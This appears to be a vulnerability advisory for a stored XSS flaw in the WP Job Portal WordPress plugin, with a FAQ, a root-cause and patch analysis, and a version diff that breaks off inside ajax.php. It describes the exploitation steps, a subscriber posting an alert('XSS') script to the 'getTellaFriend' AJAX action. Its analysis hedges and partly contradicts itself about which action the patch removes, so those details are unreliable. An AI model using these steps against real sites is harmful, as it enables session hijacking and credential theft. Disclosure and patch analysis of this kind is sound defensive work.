What is CVE-2026-48880?

CVE-2026-48880 is a Stored Cross-Site Scripting (XSS) vulnerability found in the WP Job Portal plugin for WordPress, affecting versions up to and including 2.5.2. It allows authenticated users with subscriber-level access or higher to inject arbitrary JavaScript into email templates, which can execute when viewed by other users.

How does the vulnerability work?

The vulnerability exists in the ‘getTellaFriend’ AJAX action, where user-supplied input is not properly sanitized or escaped. An authenticated attacker can send a POST request with malicious payloads that get stored in the database, leading to execution of injected scripts when the email template is accessed.

Who is affected by this vulnerability?

Any WordPress site using the WP Job Portal plugin version 2.5.2 or earlier is affected. Specifically, authenticated users with subscriber-level access or above can exploit this vulnerability to inject malicious scripts.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the WP Job Portal plugin installed. If it is version 2.5.2 or earlier, your site is at risk. Additionally, review user roles to identify if any users have subscriber-level access or higher.

How can I fix the vulnerability?

To fix the vulnerability, update the WP Job Portal plugin to version 2.5.3 or later, where the vulnerable AJAX actions have been removed. Regularly check for updates to ensure your plugins are secure.

What does the CVSS score of 6.4 indicate?

A CVSS score of 6.4 indicates a medium severity vulnerability. This suggests that while the vulnerability is not critical, it poses a significant risk, especially in multi-user environments where low-privileged accounts can exploit it.

What practical risks does this vulnerability pose?

Successful exploitation can lead to session hijacking, credential theft, and unauthorized actions within the WordPress admin area. Malicious scripts can redirect users to harmful sites or compromise user data.

What is a proof of concept (PoC) in this context?

A proof of concept (PoC) is a demonstration that shows how the vulnerability can be exploited. In this case, the PoC illustrates how an authenticated user can inject a script via the ‘getTellaFriend’ AJAX action, highlighting the ease of exploitation.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the WP Job Portal plugin until a patch can be applied. Additionally, review user permissions and limit access for subscribers to minimize the risk.

Are there any additional security measures I should take?

Implement security best practices such as regular updates, using a web application firewall, and monitoring user activity. Educate users about security and restrict access based on roles to further protect your site.

How does this vulnerability relate to general web security?

Stored XSS vulnerabilities are common in web applications and can have severe consequences. They highlight the importance of input validation and output escaping in web development to protect against script injection.

Where can I find more information about this vulnerability?

For more information, refer to the official CVE database, security advisories from WordPress, and documentation from the plugin developers. Security forums and blogs may also provide insights and updates on this issue.

Published : June 21, 2026

CVE-2026-48880: WP Job Portal – AI-Powered Recruitment System for Company or Job Board website <= 2.5.2 Authenticated (Subscriber+) Stored Cross-Site Scripting PoC, Patch Analysis & Rule

CVE ID CVE-2026-48880

Plugin wp-job-portal

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 2.5.2

Patched Version 2.5.3

Disclosed June 1, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-48880: WP Job Portal plugin versions up to and including 2.5.2 contain a Stored Cross-Site Scripting vulnerability in the ‘getTellaFriend’ AJAX action. The vulnerability impacts the core plugin component and carries a CVSS score of 6.4, indicating medium severity. The vulnerability allows authenticated attackers with subscriber-level access or above to inject arbitrary JavaScript into email template fields that are later rendered to users.

Root Cause: The vulnerability exists in the AJAX handler defined in /wp-job-portal/includes/ajax.php. The ‘getTellaFriend’ function is listed in the allowed functions array at line 24, but notably ‘getTellaFriendJobManager’ was removed in the patch. The ‘getTellaFriend’ action processes user-supplied input for email templates, likely the ‘body’ or ‘subject’ fields within the wj_portal_emailtemplates table. The plugin fails to sanitize these inputs when storing them and fails to escape them when rendering. The diff shows the removal of ‘getTellaFriendJobManager’ and ‘sendmailtofriendJobManager’ from the allowed functions, suggesting these exposed endpoints where user input could be stored without proper sanitization.

Exploitation: An authenticated attacker with subscriber privileges sends a POST request to /wp-admin/admin-ajax.php with the ‘action’ parameter set to ‘getTellaFriend’. The attacker includes payloads in parameters that map to email template fields such as ‘subject’, ‘body’, or other user-controlled fields. The malicious JavaScript, for example alert(‘XSS’), is stored in the database and executed when an administrator or other user views the email template or sends emails using the compromised template. The attack does not require a valid nonce as the AJAX handler does not validate capabilities for this specific action.

Patch Analysis: The patch removes the ‘getTellaFriendJobManager’ and ‘sendmailtofriendJobManager’ entries from the allowed AJAX functions array in ajax.php. This eliminates the vulnerable endpoints entirely. The diff also shows version bump from 2.5.2 to 2.5.3. The patch does not introduce new sanitization or escaping functions; instead, it removes the complete attack surface by disabling the vulnerable AJAX actions.

Impact: Successful exploitation allows attackers to inject arbitrary HTML and JavaScript into the WordPress admin area. This can lead to session hijacking, credential theft, forced administrative actions, and redirection to malicious websites. Any page that displays the compromised email template content will execute the injected scripts. Since the attack requires only subscriber-level authentication, it poses a significant risk to multi-user WordPress installations where users with low privileges can compromise site security.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/wp-job-portal/includes/activation.php
+++ b/wp-job-portal/includes/activation.php
@@ -468,7 +468,7 @@
               ('searchjobtag', '4', 'job', 'tag'),
               ('categories_colsperrow', '3', 'category', NULL),
               ('productcode', 'wpjobportal', 'default', NULL),
-              ('versioncode', '2.5.2', 'default', NULL),
+              ('versioncode', '2.5.3', 'default', NULL),
               ('producttype', 'free', 'default', NULL),
               ('vis_jscredits', '0', 'jscontrolpanel', 'credits'),
               ('vis_emcredits', '1', 'emcontrolpanel', NULL),
@@ -991,8 +991,8 @@
           wpjobportal::$_db->query($query);


-          $query = "INSERT INTO `" . wpjobportal::$_db->prefix . "wj_portal_emailtemplates` (`id`, `uid`, `templatefor`, `title`, `subject`, `body`, `status`, `created`) VALUES(11, 0, 'jobseeker-package-expire', NULL, 'WP Job Portal : {PACKAGE_NAME} has been expired', '<div style="background-color: #f7f7f7; margin: 0; padding: 70px 0; width: 100%;">n<div style="border: 3px dotted #ebecec; width: 600px; display: block; margin: 0 auto; background: #fff;">n<div style="padding: 15px 20px; background: #3e4095; color: #fff; font-size: 16px; font-weight: bold; text-transform: uppercase; border-bottom: 1px solid #4b4b4d;">Wp Job Portal</div>n<div style="padding: 30px; text-align: center; font-weight: bold; background: #576cf1; color: #fff; text-transform: capitalize; font-size: 22px;">{SITETITLE}: Jobseeker Package Expiry</div>n<div style="padding: 40px 20px 20px;">n<div style="padding-bottom: 20px; border-bottom: 1px solid #ebecec;">n<div style="font-weight: bold; font-size: 18px; margin-bottom: 15px; color: #4b4b4d;">Dear {JOBSEEKER_NAME},</div>n<div style="color: #727376; line-height: 2;">Your (<strong style="color: #4b4b4d;">{PACKAGE_NAME}</strong>) has been expired.</div>n<div style="color: #727376; line-height: 2;">You had purchased this package at (<strong style="color: #4b4b4d;">{PACKAGE_PURCHASE_DATE}</strong>).</div>n</div>n<div style="padding: 20px 0;">n</div>n<div style="padding: 0 0 30px; text-align: center;"><a style="display: inline-block; padding: 15px; background: #576cf1; width: 40%; text-align: center; text-decoration: none; color: #ffff; text-transform: capitalize; border-bottom: 3px solid #4b4b4d;" href="{PACKAGE_LINK}">View Package</a></div>n<div style="background: #fef2ef; padding: 15px; margin-bottom: 20px; border: 1px solid #eba7a8;">n<div style="font-weight: bold; font-size: 14px; margin-bottom: 5px; color: #983133; text-transform: uppercase;">Do not reply TO this E-Mail</div>n<div style="color: #727376; line-height: 2;">This is an automated e-mail message sent from our support system.<br />nDo not reply to this e-mail as we cannot receive your reply!</div>n</div>n<div style="color: #727376; line-height: 2;">This email was sent from <span style="color: #3e4095; display: inline-block; text-decoration: underline;"> Wp Job Portal System </span> to <span style="color: #606062; display: inline-block; text-decoration: underline;">{EMAIL}</span></div>n</div>n<div style="background: #4b4b4d; padding: 20px; color: #fff; text-align: center; border-bottom: 5px solid #576cf1;">© {CURRENT_YEAR} All rights reserved – Wp Job Portal WordPress Plugin</div>n</div>n</div>n', NULL, '2009-08-18 16:46:16'),
-          (12, 0, 'jobseeker-purchase-credit-pack', NULL, 'WP Job Portal : You purchased new package {PACKAGE_NAME}', '<div style="background-color: #f7f7f7; margin: 0; padding: 70px 0; width: 100%;">n<div style="border: 3px dotted #ebecec; width: 600px; display: block; margin: 0 auto; background: #fff;">n<div style="padding: 15px 20px; background: #3e4095; color: #fff; font-size: 16px; font-weight: bold; text-transform: uppercase; border-bottom: 1px solid #4b4b4d;">Wp Job Portal</div>n<div style="padding: 30px; text-align: center; font-weight: bold; background: #576cf1; color: #fff; text-transform: capitalize; font-size: 22px;">{SITETITLE}: Jobseeker Purchase Credits Pack</div>n<div style="padding: 40px 20px 20px;">n<div style="padding-bottom: 20px; border-bottom: 1px solid #ebecec;">n<div style="font-weight: bold; font-size: 18px; margin-bottom: 15px; color: #4b4b4d;">Dear {JOBSEEKER_NAME},</div>n<div style="color: #727376; line-height: 2;">You have purchased new package (<strong style="color: #4b4b4d;">{PACKAGE_NAME}</strong>).</div>n<div style="color: #727376; line-height: 2;">(<strong style="color: #4b4b4d;">{PACKAGE_PRICE}</strong>) credits consumed for this package.</div>n<div style="color: #727376; line-height: 2;">Package purchased date (<strong style="color: #4b4b4d;">{PACKAGE_PURCHASE_DATE}</strong>).</div>n</div>n<div style="padding: 20px 0;">n</div>n<div style="padding: 0 0 30px; text-align: center;"><a style="display: inline-block; padding: 15px; background: #576cf1; width: 40%; text-align: center; text-decoration: none; color: #ffff; text-transform: capitalize; border-bottom: 3px solid #4b4b4d;" href="{PACKAGE_LINK}">View Package</a></div>n<div style="background: #fef2ef; padding: 15px; margin-bottom: 20px; border: 1px solid #eba7a8;">n<div style="font-weight: bold; font-size: 14px; margin-bottom: 5px; color: #983133; text-transform: uppercase;">Do not reply TO this E-Mail</div>n<div style="color: #727376; line-height: 2;">This is an automated e-mail message sent from our support system.<br />nDo not reply to this e-mail as we cannot receive your reply!</div>n</div>n<div style="color: #727376; line-height: 2;">This email was sent from <span style="color: #3e4095; display: inline-block; text-decoration: underline;"> Wp Job Portal System </span> to <span style="color: #606062; display: inline-block; text-decoration: underline;">{EMAIL}</span></div>n</div>n<div style="background: #4b4b4d; padding: 20px; color: #fff; text-align: center; border-bottom: 5px solid #576cf1;">© {CURRENT_YEAR} All rights reserved – Wp Job Portal WordPress Plugin</div>n</div>n</div>n', NULL, '2009-08-18 16:46:16'),
+          $query = "INSERT INTO `" . wpjobportal::$_db->prefix . "wj_portal_emailtemplates` (`id`, `uid`, `templatefor`, `title`, `subject`, `body`, `status`, `created`) VALUES(11, 0, 'jobseeker-package-expire', NULL, 'WP Job Portal : {PACKAGE_NAME} has been expired', '<div style="background-color: #f7f7f7; margin: 0; padding: 70px 0; width: 100%;">n<div style="border: 3px dotted #ebecec; width: 600px; display: block; margin: 0 auto; background: #fff;">n<div style="padding: 15px 20px; background: #3e4095; color: #fff; font-size: 16px; font-weight: bold; text-transform: uppercase; border-bottom: 1px solid #4b4b4d;">Wp Job Portal</div>n<div style="padding: 30px; text-align: center; font-weight: bold; background: #576cf1; color: #fff; text-transform: capitalize; font-size: 22px;">{SITETITLE}: Job seeker Package Expiry</div>n<div style="padding: 40px 20px 20px;">n<div style="padding-bottom: 20px; border-bottom: 1px solid #ebecec;">n<div style="font-weight: bold; font-size: 18px; margin-bottom: 15px; color: #4b4b4d;">Dear {JOBSEEKER_NAME},</div>n<div style="color: #727376; line-height: 2;">Your (<strong style="color: #4b4b4d;">{PACKAGE_NAME}</strong>) has been expired.</div>n<div style="color: #727376; line-height: 2;">You had purchased this package at (<strong style="color: #4b4b4d;">{PACKAGE_PURCHASE_DATE}</strong>).</div>n</div>n<div style="padding: 20px 0;">n</div>n<div style="padding: 0 0 30px; text-align: center;"><a style="display: inline-block; padding: 15px; background: #576cf1; width: 40%; text-align: center; text-decoration: none; color: #ffff; text-transform: capitalize; border-bottom: 3px solid #4b4b4d;" href="{PACKAGE_LINK}">View Package</a></div>n<div style="background: #fef2ef; padding: 15px; margin-bottom: 20px; border: 1px solid #eba7a8;">n<div style="font-weight: bold; font-size: 14px; margin-bottom: 5px; color: #983133; text-transform: uppercase;">Do not reply TO this E-Mail</div>n<div style="color: #727376; line-height: 2;">This is an automated e-mail message sent from our support system.<br />nDo not reply to this e-mail as we cannot receive your reply!</div>n</div>n<div style="color: #727376; line-height: 2;">This email was sent from <span style="color: #3e4095; display: inline-block; text-decoration: underline;"> Wp Job Portal System </span> to <span style="color: #606062; display: inline-block; text-decoration: underline;">{EMAIL}</span></div>n</div>n<div style="background: #4b4b4d; padding: 20px; color: #fff; text-align: center; border-bottom: 5px solid #576cf1;">© {CURRENT_YEAR} All rights reserved – Wp Job Portal WordPress Plugin</div>n</div>n</div>n', NULL, '2009-08-18 16:46:16'),
+          (12, 0, 'jobseeker-purchase-credit-pack', NULL, 'WP Job Portal : You purchased new package {PACKAGE_NAME}', '<div style="background-color: #f7f7f7; margin: 0; padding: 70px 0; width: 100%;">n<div style="border: 3px dotted #ebecec; width: 600px; display: block; margin: 0 auto; background: #fff;">n<div style="padding: 15px 20px; background: #3e4095; color: #fff; font-size: 16px; font-weight: bold; text-transform: uppercase; border-bottom: 1px solid #4b4b4d;">Wp Job Portal</div>n<div style="padding: 30px; text-align: center; font-weight: bold; background: #576cf1; color: #fff; text-transform: capitalize; font-size: 22px;">{SITETITLE}: Job seeker Purchase Credits Pack</div>n<div style="padding: 40px 20px 20px;">n<div style="padding-bottom: 20px; border-bottom: 1px solid #ebecec;">n<div style="font-weight: bold; font-size: 18px; margin-bottom: 15px; color: #4b4b4d;">Dear {JOBSEEKER_NAME},</div>n<div style="color: #727376; line-height: 2;">You have purchased new package (<strong style="color: #4b4b4d;">{PACKAGE_NAME}</strong>).</div>n<div style="color: #727376; line-height: 2;">(<strong style="color: #4b4b4d;">{PACKAGE_PRICE}</strong>) credits consumed for this package.</div>n<div style="color: #727376; line-height: 2;">Package purchased date (<strong style="color: #4b4b4d;">{PACKAGE_PURCHASE_DATE}</strong>).</div>n</div>n<div style="padding: 20px 0;">n</div>n<div style="padding: 0 0 30px; text-align: center;"><a style="display: inline-block; padding: 15px; background: #576cf1; width: 40%; text-align: center; text-decoration: none; color: #ffff; text-transform: capitalize; border-bottom: 3px solid #4b4b4d;" href="{PACKAGE_LINK}">View Package</a></div>n<div style="background: #fef2ef; padding: 15px; margin-bottom: 20px; border: 1px solid #eba7a8;">n<div style="font-weight: bold; font-size: 14px; margin-bottom: 5px; color: #983133; text-transform: uppercase;">Do not reply TO this E-Mail</div>n<div style="color: #727376; line-height: 2;">This is an automated e-mail message sent from our support system.<br />nDo not reply to this e-mail as we cannot receive your reply!</div>n</div>n<div style="color: #727376; line-height: 2;">This email was sent from <span style="color: #3e4095; display: inline-block; text-decoration: underline;"> Wp Job Portal System </span> to <span style="color: #606062; display: inline-block; text-decoration: underline;">{EMAIL}</span></div>n</div>n<div style="background: #4b4b4d; padding: 20px; color: #fff; text-align: center; border-bottom: 5px solid #576cf1;">© {CURRENT_YEAR} All rights reserved – Wp Job Portal WordPress Plugin</div>n</div>n</div>n', NULL, '2009-08-18 16:46:16'),
           (13, NULL, 'employer-package-expire', NULL, 'WP Job Portal : {PACKAGE_NAME} has been expired', '<div style="background-color: #f7f7f7; margin: 0; padding: 70px 0; width: 100%;">n<div style="border: 3px dotted #ebecec; width: 600px; display: block; margin: 0 auto; background: #fff;">n<div style="padding: 15px 20px; background: #3e4095; color: #fff; font-size: 16px; font-weight: bold; text-transform: uppercase; border-bottom: 1px solid #4b4b4d;">Wp Job Portal</div>n<div style="padding: 30px; text-align: center; font-weight: bold; background: #576cf1; color: #fff; text-transform: capitalize; font-size: 22px;">{SITETITLE}: Employer Package Expiry</div>n<div style="padding: 40px 20px 20px;">n<div style="padding-bottom: 20px; border-bottom: 1px solid #ebecec;">n<div style="font-weight: bold; font-size: 18px; margin-bottom: 15px; color: #4b4b4d;">Dear {EMPLOYER_NAME},</div>n<div style="color: #727376; line-height: 2;">Your (<strong style="color: #4b4b4d;">{PACKAGE_NAME}</strong>) has been expired.</div>n<div style="color: #727376; line-height: 2;">You had purchased this package at (<strong style="color: #4b4b4d;">{PACKAGE_PURCHASE_DATE}</strong>).</div>n</div>n<div style="padding: 20px 0;">n</div>n<div style="padding: 0 0 30px; text-align: center;"><a style="display: inline-block; padding: 15px; background: #576cf1; width: 40%; text-align: center; text-decoration: none; color: #ffff; text-transform: capitalize; border-bottom: 3px solid #4b4b4d;" href="{PACKAGE_LINK}">View Package</a></div>n<div style="background: #fef2ef; padding: 15px; margin-bottom: 20px; border: 1px solid #eba7a8;">n<div style="font-weight: bold; font-size: 14px; margin-bottom: 5px; color: #983133; text-transform: uppercase;">Do not reply TO this E-Mail</div>n<div style="color: #727376; line-height: 2;">This is an automated e-mail message sent from our support system.<br />nDo not reply to this e-mail as we cannot receive your reply!</div>n</div>n<div style="color: #727376; line-height: 2;">This email was sent from <span style="color: #3e4095; display: inline-block; text-decoration: underline;"> Wp Job Portal System </span> to <span style="color: #606062; display: inline-block; text-decoration: underline;">{EMAIL}</span></div>n</div>n<div style="background: #4b4b4d; padding: 20px; color: #fff; text-align: center; border-bottom: 5px solid #576cf1;">© {CURRENT_YEAR} All rights reserved – Wp Job Portal WordPress Plugin</div>n</div>n</div>n', NULL, '0000-00-00 00:00:00'),
           (14, NULL, 'jobapply-employer', '', 'WP Job Portal : Job seeker have applied for {JOB_TITLE} job ', '<div style="background-color: #f7f7f7; margin: 0; padding: 70px 0; width: 100%;">n<div style="border: 3px dotted #ebecec; width: 600px; display: block; margin: 0 auto; background: #fff;">n<div style="padding: 15px 20px; background: #3e4095; color: #fff; font-size: 16px; font-weight: bold; text-transform: uppercase; border-bottom: 1px solid #4b4b4d;">Wp Job Portal</div>n<div style="padding: 30px; text-align: center; font-weight: bold; background: #576cf1; color: #fff; text-transform: capitalize; font-size: 22px;">{SITETITLE}: Job Apply Employer</div>n<div style="padding: 40px 20px 20px;">n<div style="padding-bottom: 20px; border-bottom: 1px solid #ebecec;">n<div style="font-weight: bold; font-size: 18px; margin-bottom: 15px; color: #4b4b4d;">Dear {EMPLOYER_NAME},</div>n<div style="color: #727376; line-height: 2;">Mr/Mrs (<strong style="color: #4b4b4d;">{JOBSEEKER_NAME}</strong>) applied for your job (<strong style="color: #4b4b4d;">{JOB_TITLE}</strong>).</div>n<div style="color: #727376; line-height: 2;">Current Applied Resume status is (<strong style="color: #4b4b4d;">{RESUME_APPLIED_STATUS}</strong>).</div>n<div style="color: #727376; line-height: 2;">(<strong style="color: #4b4b4d;">{COVER_LETTER_DESCRIPTION}</strong>).</div>n<div style="color: #727376; line-height: 2;">(<strong style="color: #4b4b4d;">{RESUME_DATA}</strong>).</div>n</div>n<div style="padding: 20px 0;">n</div>n<div style="padding: 0 0 30px; text-align: center;"><a style="display: inline-block; padding: 15px; background: #576cf1; width: 40%; text-align: center; text-decoration: none; color: #ffff; text-transform: capitalize; border-bottom: 3px solid #4b4b4d;" href="{RESUME_LINK}">View Resume</a></div>n<div style="background: #fef2ef; padding: 15px; margin-bottom: 20px; border: 1px solid #eba7a8;">n<div style="font-weight: bold; font-size: 14px; margin-bottom: 5px; color: #983133; text-transform: uppercase;">Do not reply TO this E-Mail</div>n<div style="color: #727376; line-height: 2;">This is an automated e-mail message sent from our support system.<br />nDo not reply to this e-mail as we cannot receive your reply!</div>n</div>n<div style="color: #727376; line-height: 2;">This email was sent from <span style="color: #3e4095; display: inline-block; text-decoration: underline;"> Wp Job Portal System </span> to <span style="color: #606062; display: inline-block; text-decoration: underline;">{EMAIL}</span></div>n</div>n<div style="background: #4b4b4d; padding: 20px; color: #fff; text-align: center; border-bottom: 5px solid #576cf1;">© {CURRENT_YEAR} All rights reserved – Wp Job Portal WordPress Plugin</div>n</div>n</div>n', NULL, '0000-00-00 00:00:00');";
           wpjobportal::$_db->query($query);
@@ -1151,7 +1151,7 @@
             (20, 'workplace_type', 'Workplace Type', 8, '', 0, NULL, 'Specify if the job is On-site, Hybrid, or Remote', 2, 1, 1, 0, 0, 0, 0, '', '', 1, 1, NULL, 0, 1, 0, '', 0, 0, 0, 0, 0, '', NULL, NULL),
             (21, 'experience', 'Experience', 10, '', 0, NULL, NULL, 2, 1, 1, 0, 0, 0, 0, '', '', 0, 0, NULL, 1, 0, 1, '', 0, 0, 0, 0, 0, '', NULL, NULL),
             (102, 'is_urgent', 'Is Urgent', 12, '', 0, NULL, 'Check if this job is urgently hiring', 2, 1, 1, 0, 0, 0, 0, '', '', 1, 1, NULL, 0, 1, 0, '', 0, 0, 0, 0, 0, '', NULL, NULL),
-            (22, 'noofjobs', 'No of Jobs', 13, '', 0, '', '', 2, 1, 1, 0, 0, 0, 0, '', '', 0, 0, NULL, 1, 1, 1, '', 0, 0, 0, 0, 0, '', NULL, NULL),
+            (22, 'noofjobs', 'Number of Jobs', 13, '', 0, '', '', 2, 1, 1, 0, 0, 0, 0, '', '', 0, 0, NULL, 1, 1, 1, '', 0, 0, 0, 0, 0, '', NULL, NULL),
             (23, 'duration', 'Duration', 9, '', 0, NULL, NULL, 2, 1, 1, 0, 0, 0, 0, '', '', 1, 1, NULL, 0, 0, 1, '', 0, 0, 0, 0, 0, '', NULL, NULL),
             (24, 'careerlevel', 'Career Level', 11, '', 0, NULL, NULL, 2, 1, 1, 0, 0, 0, 0, '', '', 1, 1, NULL, 0, 0, 1, '', 0, 0, 0, 0, 0, '', NULL, NULL),
             (25, 'map', 'Map', 18, '', 0, NULL, NULL, 2, 1, 1, 0, 0, 0, 0, '', '', 1, 1, NULL, 0, 0, 1, '', 0, 0, 0, 0, 0, '', NULL, NULL),
@@ -1205,7 +1205,7 @@
             (79, 'section_language', 'Add Language', 100, '8', 1, NULL, NULL, 3, 1, 1, 0, 0, 0, 0, '', '', 0, 0, NULL, 1, 0, 1, '', 0, 0, 0, 0, 0, '', NULL, NULL),
             (80, 'language', 'Language Name', 59, '8', 0, NULL, NULL, 3, 1, 1, 0, 0, 0, 0, '', '', 0, 0, NULL, 1, 0, 1, '', 0, 0, 0, 0, 0, '', NULL, NULL),
             (81, 'institute_date_from', 'Date From', 36, '3', 0, NULL, NULL, 3, 1, 1, 0, 0, 0, 0, '', '', 0, 0, NULL, 1, 0, 1, '', 0, 0, 0, 0, 0, '', NULL, NULL),
-            (82, 'institute_date_to', 'Date to', 35, '3', 0, NULL, NULL, 3, 1, 1, 0, 0, 0, 0, '', '', 0, 0, NULL, 1, 0, 1, '', 0, 0, 0, 0, 0, '', NULL, NULL),
+            (82, 'institute_date_to', 'Date To', 35, '3', 0, NULL, NULL, 3, 1, 1, 0, 0, 0, 0, '', '', 0, 0, NULL, 1, 0, 1, '', 0, 0, 0, 0, 0, '', NULL, NULL),
             (83, 'termsandconditions', 'Terms And Conditions', 24, '1', 0, NULL, NULL, 3, 0, 0, 0, 0, 1, 0, '', '', 0, 0, NULL, 1, 0, 1, '', 0, 0, 0, 0, 0, '', NULL, NULL),
             (84, 'tagline', 'Tag Line', 13, '', 0, NULL, '', 1, 1, 1, 0, 0, 0, 0, '', '', 0, 0, NULL, 1, 0, 1, '', 0, 0, 0, 0, 0, '', NULL, NULL),
             (85, 'salaryfixed', 'Desired Salary', 13, '1', 0, '12', '1', 3, 1, 1, 0, 0, 1, 0, '', '', 1, 1, 102, 0, 1, 0, '', 0, 0, 0, 0, 0, '', NULL, NULL),
--- a/wp-job-portal/includes/addon-updater/wpjobportalupdater.php
+++ b/wp-job-portal/includes/addon-updater/wpjobportalupdater.php
@@ -81,132 +81,6 @@
 		}
 	}

-	public function jsCheckVersionUpdate( $wpjobportal_update_data ) {
-		if ( empty( $wpjobportal_update_data->checked ) ) {
-			return $wpjobportal_update_data;
-		}
-		$response_version_data = get_transient('wpjobportal_addon_update_temp_data');
-		$response_version_data_cdn = get_transient('wpjobportal_addon_update_temp_data_cdn');
-
-		if(isset($_SERVER) &&  $_SERVER['REQUEST_URI'] !=''){
-            if(wpjobportalphplib::wpJP_strstr( $_SERVER['REQUEST_URI'], 'plugins.php')) {
-				$response_version_data = get_transient('wpjobportal_addon_update_temp_data_plugins');
-				$response_version_data_cdn = get_transient('wpjobportal_addon_update_temp_data_plugins_cdn');
-			}
-        }
-        if($response_version_data_cdn === false){
-			$wpjobportal_cdnversiondata = $this->getPluginVersionDataFromCDN();
-			set_transient('wpjobportal_addon_update_temp_data_cdn', $wpjobportal_cdnversiondata, HOUR_IN_SECONDS * 6);
-			set_transient('wpjobportal_addon_update_temp_data_plugins_cdn', $wpjobportal_cdnversiondata, 15);
-		}else{
-			$wpjobportal_cdnversiondata = $response_version_data_cdn;
-		}
-		$wpjobportal_newversionfound = 0;
-		if ( $wpjobportal_cdnversiondata) {
-			if(is_object($wpjobportal_cdnversiondata) ){
-				foreach ($wpjobportal_update_data->checked AS $wpjobportal_key => $wpjobportal_value) {
-					$c_key_array = wpjobportalphplib::wpJP_explode('/', $wpjobportal_key);
-					$c_key = $c_key_array[0];
-					$c_key = wpjobportalphplib::wpJP_str_replace("-","",$c_key);
-					$wpjobportal_newversion = $this->getVersionFromLiveData($wpjobportal_cdnversiondata, $c_key);
-					if($wpjobportal_newversion){
-						if(version_compare( $wpjobportal_newversion, $wpjobportal_value, '>' )){
-							$wpjobportal_newversionfound = 1;
-						}
-					}
-				}
-			}
-		}
-		if($wpjobportal_newversionfound == 1){
-			if($response_version_data === false){
-				$response = $this->getPluginVersionData();
-				set_transient('wpjobportal_addon_update_temp_data', $response, HOUR_IN_SECONDS * 6);
-				set_transient('wpjobportal_addon_update_temp_data_plugins', $response, 15);
-			}else{
-				$response = $response_version_data;
-			}
-			if ( $response) {
-				if(is_object($response) ){
-					if(isset($response->addon_response_type) && $response->addon_response_type == 'no_key'){
-						foreach ($wpjobportal_update_data->checked AS $wpjobportal_key => $wpjobportal_value) {
-							$c_key_array = wpjobportalphplib::wpJP_explode('/', $wpjobportal_key);
-							$c_key = $c_key_array[0];
-							if(isset($response->addon_version_data->{$c_key})){
-								if(version_compare( $response->addon_version_data->{$c_key}, $wpjobportal_value, '>' )){
-									$wpjobportal_transient_val = get_transient('wpjobportal_addon_hide_update_notice');
-									if($wpjobportal_transient_val === false){
-										set_transient('wpjobportal_addon_hide_update_notice', 1, DAY_IN_SECONDS );
-									}
-									$this->addon_update_data[$wpjobportal_key] = $response->addon_version_data->{$c_key};
-								}
-							}
-						}
-					}else{// addon_response_type other than no_key
-						foreach ($wpjobportal_update_data->checked AS $wpjobportal_key => $wpjobportal_value) {
-							$c_key_array = wpjobportalphplib::wpJP_explode('/', $wpjobportal_key);
-							$c_key = $c_key_array[0];
-							if(isset($response->addon_update_data) && !empty($response->addon_update_data) && isset( $response->addon_update_data->{$c_key})){
-								if(version_compare( $response->addon_update_data->{$c_key}->new_version, $wpjobportal_value, '>' )){
-									$wpjobportal_update_data->response[ $wpjobportal_key ] = $response->addon_update_data->{$c_key};
-									$this->addon_update_data[$wpjobportal_key] = $response->addon_update_data->{$c_key};
-								}
-							}elseif(isset($response->addon_version_data->{$c_key})){
-								if(version_compare( $response->addon_version_data->{$c_key}, $wpjobportal_value, '>' )){
-									$wpjobportal_transient_val = get_transient('wpjobportal_addon_hide_update_expired_key_notice');
-									if($wpjobportal_transient_val === false){
-										set_transient('wpjobportal_addon_hide_update_expired_key_notice', 1, DAY_IN_SECONDS );
-									}
-									$this->addon_update_data_errors[$wpjobportal_key] = $response->addon_version_data->{$c_key};
-									$this->addon_update_data[$wpjobportal_key] = $response->addon_version_data->{$c_key};
-								}
-							}else{ // set latest version from cdn data
-								if ( $wpjobportal_cdnversiondata) {
-									if(is_object($wpjobportal_cdnversiondata) ){
-										$c_key_plain = wpjobportalphplib::wpJP_str_replace("-","",$c_key);
-										$wpjobportal_newversion = $this->getVersionFromLiveData($wpjobportal_cdnversiondata, $c_key_plain);
-										if($wpjobportal_newversion){
-											if(version_compare( $wpjobportal_newversion, $wpjobportal_value, '>' )){
-
-												$wpjobportal_option_name = 'transaction_key_for_'.$c_key;
-												$wpjobportal_transaction_key = wpjobportal::$_common->getTranskey($wpjobportal_option_name);
-												$wpjobportal_addon_json_array = array();
-												$wpjobportal_addon_json_array[] = wpjobportalphplib::wpJP_str_replace('wp-job-portal-', '', $c_key);
-												$wpjobportal_url = 'https://wpjobportal.com/setup/index.php?token='.$wpjobportal_transaction_key.'&productcode='. wp_json_encode($wpjobportal_addon_json_array).'&domain='. site_url();
-
-												// prepping data for seamless update of allowed addons
-												$plugin = new stdClass();
-												$plugin->id = 'w.org/plugins/wp-job-portal';
-												$wpjobportal_addon_slug = $c_key;
-												$plugin->name = $wpjobportal_addon_slug;
-												$plugin->plugin = $wpjobportal_addon_slug.'/'.$wpjobportal_addon_slug.'.php';
-												$plugin->slug = $wpjobportal_addon_slug;
-												$plugin->version = '1.0.0';
-												$wpjobportal_addonwithoutslash = wpjobportalphplib::wpJP_str_replace('-', '', $wpjobportal_addon_slug);
-												$plugin->new_version = $wpjobportal_newversion;
-												$plugin->url = 'https://www.wpjobportal.com/';
-												$plugin->download_url = $wpjobportal_url;
-												$plugin->package = $wpjobportal_url;
-												$plugin->trunk = $wpjobportal_url;
-
-												$wpjobportal_update_data->response[ $wpjobportal_key ] = $plugin;
-												$this->addon_update_data[$wpjobportal_key] = $plugin;
-											}
-										}
-
-									}
-								}
-							}
-						}
-					}
-				}
-			}
-		}// new version found
-		if(isset($wpjobportal_update_data->checked)){
-			$this->addon_installed_version_data = $wpjobportal_update_data->checked;
-		}
-		return $wpjobportal_update_data;
-	}
-
 	public function jsPluginsAPI( $false, $wpjobportal_action, $wpjobportal_args ) {
 		if (!isset( $wpjobportal_args->slug )) {
 			return false;
--- a/wp-job-portal/includes/ajax.php
+++ b/wp-job-portal/includes/ajax.php
@@ -19,20 +19,20 @@
     function ajaxhandler() {
         $fucntin_allowed = array('DataForDepandantFieldResume', 'DataForDepandantField', 'saveJobShortlist', 'saveJobShortlistJobManager',
                                 'getQuickViewByJobId', 'getShortListViewByJobId', 'getShortListViewByJobIdJobPortal', 'getApplyNowByJobid',
